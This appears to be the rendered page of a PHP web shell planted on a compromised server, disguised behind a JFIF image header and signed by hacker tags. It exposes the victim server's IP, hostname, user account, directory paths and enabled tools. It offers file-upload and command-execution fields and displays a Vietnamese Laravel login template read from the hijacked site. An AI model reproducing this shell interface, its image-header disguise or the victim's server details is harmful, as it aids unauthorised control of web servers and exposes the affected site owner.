JFIFHHC     C  " 5????! ??? Donat Was Here
KENFOXXSHELL
Server IP : 160.25.81.117  /  Your IP : 216.73.216.137
Web Server : Apache/2
System : Linux sv05.hilab.cloud 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : bellizen ( 1045)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/bellizen/domains/bellizeno.com/private_html/resources/views/templates/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/bellizen/domains/bellizeno.com/private_html/resources/views/templates/dangnhap_tpl.blade.php
@extends('index')
@section('content')
<section class="login-page">

    <section class="login-content">

        <div class="container">

            <div class="row">

                <div class="col-md-4 offset-md-4">

                    <form class="login-form" name="frm_contact" method="post" action="{!! url('dang-nhap') !!}">
                        <input type="hidden" name="_token" value="{!! csrf_token() !!}" />

                        <h4>Thông tin đăng nhập</h4>
                        
                        <input type="text" class="username" required="" placeholder="Họ tên đăng nhập" name="username">

                        <div class="form-group input-group">

                            <input type="password" id="password" name="password" class="form-control" required

                                   placeholder="Mật khẩu" autocomplete="off"/>

                            <label class="input-group-addon">

                                <input type="checkbox" style="display:none" onclick="(function(e, el){

                              document.getElementById('password').type = el.checked ? 'text' : 'password';

                              })(event, this)">

                                <span class="i-abs"><i class="fa fa-eye" aria-hidden="true"></i></span>

                            </label>
                            
                        </div>

                        @if(Session::has('message'))
                        <div class="form-group">
                            <p class="thongbao {{ Session::get('flag') }}" for="inputError"><i class="fa fa-times-circle-o"></i> {{ Session::get('message') }}</p>
                            
                        </div>
                        @endif
                        <button name="btnlog" type="submit">Đăng nhập</button>
                        
                        <p class="registry">

                            <a href="{!! asset('dang-ky') !!}" title="Đăng ký tài khoản">Bạn chưa có tài khoản -- Đăng ký ngay</a>

                        </p>
                        <!-- <div class="fb-login-button" data-max-rows="1" data-size="large" data-button-type="continue_with" data-show-faces="false" data-auto-logout-link="true" data-use-continue-as="true"></div> -->
                        <a href="{!! asset('redirect') !!}" class="sign-face">

                            <span class="fa fa-facebook"></span>

                            <span class="dn">Đăng nhập bằng Facebook</span>

                        </a>

                    </form>

                </div>

            </div>

        </div>

    </section>
</section>

@endsection

Anon7 - 2022
AnonSec Team